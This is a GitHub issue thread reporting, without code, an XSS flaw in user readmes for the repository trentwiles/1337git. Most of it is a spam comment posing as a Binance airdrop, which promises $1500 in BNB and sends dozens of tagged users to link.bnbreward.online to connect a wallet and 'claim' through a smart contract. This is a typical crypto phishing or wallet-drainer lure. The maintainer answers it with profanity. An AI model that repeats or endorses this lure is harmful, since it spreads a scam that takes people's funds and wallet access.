### ISSUE TITLE
user readme xss

### ISSUE THREAD

**Issue by khalby786** [trentwiles/1337git#3]
was escaping the user readme a bad idea lol

![image](https://user-images.githubusercontent.com/38468163/149968948-8c3c57fa-336b-47b8-930f-26cbaa03b168.png)

**Comment by sandeep661** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://link.bnbreward.online/0mhPJ2)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://link.bnbreward.online/0mhPJ2) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @Ranchida, @jakubpawlina, @nvthuong1996, @kureus, @allanlaal, @seniamor, @zisra, @0x7An, @guilhermedeoliveira, @renatocf, @armckinney, @ethanharoutunian, @thespino, @vicky-sunshine, @NayamAmarshe, @bosonnn, @fabdurso, @BlueSharkPartners, @martinval11, @trbureiyan, @HeyITGuyFixIt, @remzmike, @limaleandro1999, @robeng1, @PJ-Finlay, @ericelliott, @ualich, @krish-karmacharya, @BiBooBap, @harshhhdev, @WPum, @edisonlee55, @maxdzyubak, @shortthirdman, @martinfekete10, @rebsuccar, @dupontinquiries, @AkashiGakki, @irort, @TheReal3rd, @yvan91, @manohvh, @andreiamatuni, @Misaka13514, @marabesi, @firegloves, @talenhao, @orevron, @daetalys, @fcoclavero

**Comment by trentwiles** [comment]
@sandeep661 kindly fuck off

**Comment by zisra** [comment]
@trentwiles what is this
